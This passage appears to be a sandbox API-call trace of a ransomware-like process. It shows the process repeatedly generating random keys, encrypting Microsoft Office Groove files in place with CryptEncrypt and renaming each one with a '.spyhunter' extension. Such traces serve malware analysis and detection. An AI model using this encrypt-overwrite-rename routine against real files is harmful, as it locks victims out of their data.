pbData=0x31f020*, pdwDataLen=0x270f838*=0x30) returned 1 [0107.197] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveDocumentReview\\MarkupIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\groovedocumentreview\\markupiconimages.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0107.198] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveDocumentReview\\MarkupIconImages.jpg") returned 115 [0107.198] StrStrW (lpFirst="MarkupIconImages.jpg", lpSrch=".txt") returned 0x0 [0107.198] GetProcessHeap () returned 0x2c0000 [0107.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0107.198] ReadFile (in: hFile=0x154, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f7fc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f7fc*=0x98b, lpOverlapped=0x0) returned 1 [0107.211] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xfffff675, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0107.212] WriteFile (in: hFile=0x154, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x98b, lpNumberOfBytesWritten=0x270f7fc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f7fc*=0x98b, lpOverlapped=0x0) returned 1 [0107.212] GetProcessHeap () returned 0x2c0000 [0107.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0107.212] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.212] WriteFile (in: hFile=0x154, lpBuffer=0x270f83c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f7fc, lpOverlapped=0x0 | out: lpBuffer=0x270f83c*, lpNumberOfBytesWritten=0x270f7fc*=0x4, lpOverlapped=0x0) returned 1 [0107.212] WriteFile (in: hFile=0x154, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f7fc, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f7fc*=0x30, lpOverlapped=0x0) returned 1 [0107.212] CloseHandle (hObject=0x154) returned 1 [0107.216] GetProcessHeap () returned 0x2c0000 [0107.216] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2dd0048 [0107.216] wnsprintfW (in: pszDest=0x2dd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveDocumentReview\\MarkupIconImages.jpg.spyhunter") returned 125 [0107.216] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveDocumentReview\\MarkupIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\groovedocumentreview\\markupiconimages.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveDocumentReview\\MarkupIconImages.jpg.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\groovedocumentreview\\markupiconimages.jpg.spyhunter")) returned 1 [0107.217] GetProcessHeap () returned 0x2c0000 [0107.217] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2dd0048 | out: hHeap=0x2c0000) returned 1 [0107.217] GetProcessHeap () returned 0x2c0000 [0107.217] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0107.217] GetProcessHeap () returned 0x2c0000 [0107.217] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cf0ac8 | out: hHeap=0x2c0000) returned 1 [0107.217] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f838 | out: pbBuffer=0x270f838) returned 1 [0107.217] GetProcessHeap () returned 0x2c0000 [0107.217] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0107.217] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f830*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f830*=0x30) returned 1 [0107.217] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\button_right_over.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\button_right_over.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0107.218] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\button_right_over.gif") returned 107 [0107.218] StrStrW (lpFirst="button_right_over.gif", lpSrch=".txt") returned 0x0 [0107.218] GetProcessHeap () returned 0x2c0000 [0107.218] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0107.218] ReadFile (in: hFile=0xb4, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f7f4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f7f4*=0x41b, lpOverlapped=0x0) returned 1 [0107.266] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffbe5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0107.267] WriteFile (in: hFile=0xb4, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x41b, lpNumberOfBytesWritten=0x270f7f4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f7f4*=0x41b, lpOverlapped=0x0) returned 1 [0107.267] GetProcessHeap () returned 0x2c0000 [0107.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0107.267] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.267] WriteFile (in: hFile=0xb4, lpBuffer=0x270f834*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f7f4, lpOverlapped=0x0 | out: lpBuffer=0x270f834*, lpNumberOfBytesWritten=0x270f7f4*=0x4, lpOverlapped=0x0) returned 1 [0107.267] WriteFile (in: hFile=0xb4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f7f4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f7f4*=0x30, lpOverlapped=0x0) returned 1 [0107.267] CloseHandle (hObject=0xb4) returned 1 [0107.595] GetProcessHeap () returned 0x2c0000 [0107.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2dd0048 [0107.600] wnsprintfW (in: pszDest=0x2dd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\button_right_over.gif.spyhunter") returned 117 [0107.600] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\button_right_over.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\button_right_over.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\button_right_over.gif.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\button_right_over.gif.spyhunter")) returned 1 [0107.771] GetProcessHeap () returned 0x2c0000 [0107.771] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2dd0048 | out: hHeap=0x2c0000) returned 1 [0107.771] GetProcessHeap () returned 0x2c0000 [0107.771] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0107.771] GetProcessHeap () returned 0x2c0000 [0107.771] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cf2f08 | out: hHeap=0x2c0000) returned 1 [0107.771] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f838 | out: pbBuffer=0x270f838) returned 1 [0107.771] GetProcessHeap () returned 0x2c0000 [0107.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0107.771] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f830*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f830*=0x30) returned 1 [0107.771] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsHomePageStyle.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formshomepagestyle.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0107.774] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsHomePageStyle.css") returned 108 [0107.774] StrStrW (lpFirst="FormsHomePageStyle.css", lpSrch=".txt") returned 0x0 [0107.774] GetProcessHeap () returned 0x2c0000 [0107.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0107.774] ReadFile (in: hFile=0x17c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f7f4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270f7f4*=0x40c, lpOverlapped=0x0) returned 1 [0107.785] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xfffffbf4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0107.785] WriteFile (in: hFile=0x17c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x40c, lpNumberOfBytesWritten=0x270f7f4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270f7f4*=0x40c, lpOverlapped=0x0) returned 1 [0107.786] GetProcessHeap () returned 0x2c0000 [0107.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0107.786] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.786] WriteFile (in: hFile=0x17c, lpBuffer=0x270f834*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f7f4, lpOverlapped=0x0 | out: lpBuffer=0x270f834*, lpNumberOfBytesWritten=0x270f7f4*=0x4, lpOverlapped=0x0) returned 1 [0107.786] WriteFile (in: hFile=0x17c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f7f4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f7f4*=0x30, lpOverlapped=0x0) returned 1 [0107.786] CloseHandle (hObject=0x17c) returned 1 [0107.786] GetProcessHeap () returned 0x2c0000 [0107.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2dd0048 [0107.786] wnsprintfW (in: pszDest=0x2dd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsHomePageStyle.css.spyhunter") returned 118 [0107.786] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsHomePageStyle.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formshomepagestyle.css"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsHomePageStyle.css.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formshomepagestyle.css.spyhunter")) returned 1 [0107.787] GetProcessHeap () returned 0x2c0000 [0107.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2dd0048 | out: hHeap=0x2c0000) returned 1 [0107.787] GetProcessHeap () returned 0x2c0000 [0107.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0107.787] GetProcessHeap () returned 0x2c0000 [0107.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cf3848 | out: hHeap=0x2c0000) returned 1 [0107.788] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f830 | out: pbBuffer=0x270f830) returned 1 [0107.788] GetProcessHeap () returned 0x2c0000 [0107.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0107.788] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f828*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f828*=0x30) returned 1 [0107.788] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsHomePageScript.js" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formshomepagescript.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0107.789] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsHomePageScript.js") returned 108 [0107.789] StrStrW (lpFirst="FormsHomePageScript.js", lpSrch=".txt") returned 0x0 [0107.789] GetProcessHeap () returned 0x2c0000 [0107.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0107.789] ReadFile (in: hFile=0x17c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f7ec, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270f7ec*=0x15fc, lpOverlapped=0x0) returned 1 [0107.815] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffea04, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0107.815] WriteFile (in: hFile=0x17c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x15fc, lpNumberOfBytesWritten=0x270f7ec, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270f7ec*=0x15fc, lpOverlapped=0x0) returned 1 [0107.815] GetProcessHeap () returned 0x2c0000 [0107.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0107.816] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.816] WriteFile (in: hFile=0x17c, lpBuffer=0x270f82c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f7ec, lpOverlapped=0x0 | out: lpBuffer=0x270f82c*, lpNumberOfBytesWritten=0x270f7ec*=0x4, lpOverlapped=0x0) returned 1 [0107.816] WriteFile (in: hFile=0x17c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f7ec, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f7ec*=0x30, lpOverlapped=0x0) returned 1 [0107.816] CloseHandle (hObject=0x17c) returned 1 [0107.816] GetProcessHeap () returned 0x2c0000 [0107.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2dd0048 [0107.816] wnsprintfW (in: pszDest=0x2dd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsHomePageScript.js.spyhunter") returned 118 [0107.816] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsHomePageScript.js" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formshomepagescript.js"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsHomePageScript.js.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formshomepagescript.js.spyhunter")) returned 1 [0107.817] GetProcessHeap () returned 0x2c0000 [0107.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2dd0048 | out: hHeap=0x2c0000) returned 1 [0107.817] GetProcessHeap () returned 0x2c0000 [0107.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0107.817] GetProcessHeap () returned 0x2c0000 [0107.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cf3720 | out: hHeap=0x2c0000) returned 1 [0107.817] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f830 | out: pbBuffer=0x270f830) returned 1 [0107.817] GetProcessHeap () returned 0x2c0000 [0107.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0107.817] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f828*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f828*=0x30) returned 1 [0107.818] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsDoNotTrust.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formsdonottrust.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0107.824] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsDoNotTrust.html") returned 106 [0107.824] StrStrW (lpFirst="FormsDoNotTrust.html", lpSrch=".txt") returned 0x0 [0107.824] GetProcessHeap () returned 0x2c0000 [0107.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0107.824] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f7ec, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f7ec*=0x805, lpOverlapped=0x0) returned 1 [0107.825] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffff7fb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0107.825] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x805, lpNumberOfBytesWritten=0x270f7ec, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f7ec*=0x805, lpOverlapped=0x0) returned 1 [0107.826] GetProcessHeap () returned 0x2c0000 [0107.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0107.826] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.826] WriteFile (in: hFile=0x178, lpBuffer=0x270f82c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f7ec, lpOverlapped=0x0 | out: lpBuffer=0x270f82c*, lpNumberOfBytesWritten=0x270f7ec*=0x4, lpOverlapped=0x0) returned 1 [0107.826] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f7ec, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f7ec*=0x30, lpOverlapped=0x0) returned 1 [0107.826] CloseHandle (hObject=0x178) returned 1 [0107.826] GetProcessHeap () returned 0x2c0000 [0107.826] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2dd0048 [0107.826] wnsprintfW (in: pszDest=0x2dd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsDoNotTrust.html.spyhunter") returned 116 [0107.826] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsDoNotTrust.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formsdonottrust.html"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsDoNotTrust.html.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formsdonottrust.html.spyhunter")) returned 1 [0107.827] GetProcessHeap () returned 0x2c0000 [0107.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2dd0048 | out: hHeap=0x2c0000) returned 1 [0107.827] GetProcessHeap () returned 0x2c0000 [0107.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0107.827] GetProcessHeap () returned 0x2c0000 [0107.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cf34d0 | out: hHeap=0x2c0000) returned 1 [0107.827] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f828 | out: pbBuffer=0x270f828) returned 1 [0107.827] GetProcessHeap () returned 0x2c0000 [0107.827] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0107.828] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f820*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f820*=0x30) returned 1 [0107.828] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsBlankPage.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formsblankpage.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0107.829] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsBlankPage.html") returned 105 [0107.829] StrStrW (lpFirst="FormsBlankPage.html", lpSrch=".txt") returned 0x0 [0107.829] GetProcessHeap () returned 0x2c0000 [0107.829] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0107.829] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f7e4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f7e4*=0x4b2, lpOverlapped=0x0) returned 1 [0107.837] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffb4e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0107.837] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x4b2, lpNumberOfBytesWritten=0x270f7e4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f7e4*=0x4b2, lpOverlapped=0x0) returned 1 [0107.837] GetProcessHeap () returned 0x2c0000 [0107.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0107.837] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.837] WriteFile (in: hFile=0x178, lpBuffer=0x270f824*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f7e4, lpOverlapped=0x0 | out: lpBuffer=0x270f824*, lpNumberOfBytesWritten=0x270f7e4*=0x4, lpOverlapped=0x0) returned 1 [0107.839] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f7e4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f7e4*=0x30, lpOverlapped=0x0) returned 1 [0107.839] CloseHandle (hObject=0x178) returned 1 [0107.839] GetProcessHeap () returned 0x2c0000 [0107.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2dd0048 [0107.839] wnsprintfW (in: pszDest=0x2dd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsBlankPage.html.spyhunter") returned 115 [0107.839] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsBlankPage.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formsblankpage.html"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsBlankPage.html.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formsblankpage.html.spyhunter")) returned 1 [0107.840] GetProcessHeap () returned 0x2c0000 [0107.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2dd0048 | out: hHeap=0x2c0000) returned 1 [0107.840] GetProcessHeap () returned 0x2c0000 [0107.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0107.840] GetProcessHeap () returned 0x2c0000 [0107.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cf3280 | out: hHeap=0x2c0000) returned 1 [0107.843] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f820 | out: pbBuffer=0x270f820) returned 1 [0107.843] GetProcessHeap () returned 0x2c0000 [0107.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0107.844] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f818*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f818*=0x30) returned 1 [0107.844] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\UnformattedNumeric.jpg" (normalized: "c:\\program files\\microsoft 